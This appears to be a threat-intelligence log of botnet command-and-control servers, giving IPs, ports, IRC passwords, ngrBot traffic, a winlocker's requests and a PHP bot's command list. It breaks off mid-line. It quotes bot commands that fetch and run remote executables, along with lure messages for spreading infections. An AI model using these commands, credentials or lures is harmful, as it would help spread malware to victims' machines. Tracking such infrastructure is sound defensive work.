Remote Host: 31.31.76.89  Port Number: 6667
PONG :A55A8CFA
JOIN #blackout
Now talking in #blackout
Topic On: [ #blackout ] [ #blackout ]
Topic By: [ JohnDoe ]
Modes On: [ #blackout ] [ +sntru ]
Hosting info: http://whois.domaintools.com/31.31.76.89

46.166.162.116 (IRC botnet hosted in United Kingdom, Santrex Internet Services Ltd)
46.166.162.116:8585
nick yycIaIc
user yudtouga
channel #c
Now talking in #c
Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ]
Topic By: [ rise ]
Hosting info: http://whois.domaintools.com/46.166.162.116

pool.dload.asia (Bitcoin miner botnet hosted in France, Paris, Gandi)
Very big net here; the guy behind the net is making a lot of money from infected machines.
Resolved : [pool.dload.asia] To [95.142.174.210]
Resolved : [pool.dload.asia] To [92.243.3.252]
Resolved : [pool.dload.asia] To [95.142.175.27]
Resolved : [pool.dload.asia] To [95.142.161.74]
Resolved : [pool.dload.asia] To [95.142.174.205]
Resolved : [pool.dload.asia] To [95.142.170.142]
Resolved : [pool.dload.asia] To [95.142.174.64]
Resolved : [pool.dload.asia]

sukipuki4mokimoki.in (winlocker hosted in United States, Clarks Summit, Volumedrive)
HTTP Query Text:
sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1
sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1
Suspicious Actions Detected:
Copies self to other locations
Creates autorun records
Injects code into other processes
Hosting info: http://whois.domaintools.com/199.168.139.53

74.63.232.209 (ngrBot hosted in United States, New York, Limestone Networks Inc)
Remote Host: 199.15.234.7  Port Number: 80
Remote Host: 203.249.66.5  Port Number: 80
Remote Host: 74.63.232.209  Port Number: 5236
PASS ROCKR
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected

ch1mb4.info (ngrBot hosted in United States, Herndon, Road Runner Holdco Llc)
Resolved : [ch1mb4.info] To [74.62.155.207]
C&C Server: 74.62.155.207:6060
Server Password:
Username: uamethp
Nickname: n{DE|XPa}uamethp
Channel: #hell (Password: secret)
Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt
Hosting info: http://whois.domaintools.com/74.62.155.207

64.186.134.161 (ngrBot 1.0.3 hosted in United States, Atlanta, Vpsland.com Llc)
Older version of ngrBot with the original manual included.
Remote Host: 199.15.234.7  Port Number: 80
Remote Host: 64.186.134.161  Port Number: 7834
PASS puto
NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #dr3 ngrBot
Now talking in #dr3
Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]
Topic By: [

83.170.89.35 (Linux bots hosted in United Kingdom, London, Uk2 – Ltd)
<?
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download

94.102.0.165 (ngrBot hosted in Turkey, Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host: 199.15.234.7  Port Number: 80
Remote Host: 94.102.0.165  Port Number: 4444
PASS pas217
JOIN #voLwy vol323
PONG :HTTP1.4
NICK n{US|XP-32a}mwwaozy
USER mwwaozy 0 * :mwwaozy
Hosting info: http://whois.domaintools.com/94.102.0.165

lalorlz1.info (ngrBot hosted in Germany, Weinstadt, Hetzner Online Ag)
Resolved : [lalorlz1.info] To [88.198.181.16]
Resolved : [lalorlz1.info] To [176.9.192.216]
rlz1jmv.info not active
C&C Server: 88.198.181.16:5236
PASS ROCKR
Server Password:
Username: raecpnp
Nickname: n{DE|XPa}raecpnp
Channel: #ROCK (Password: ngrBot)
Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira a miley cyrus desnuda y dopada en un hotel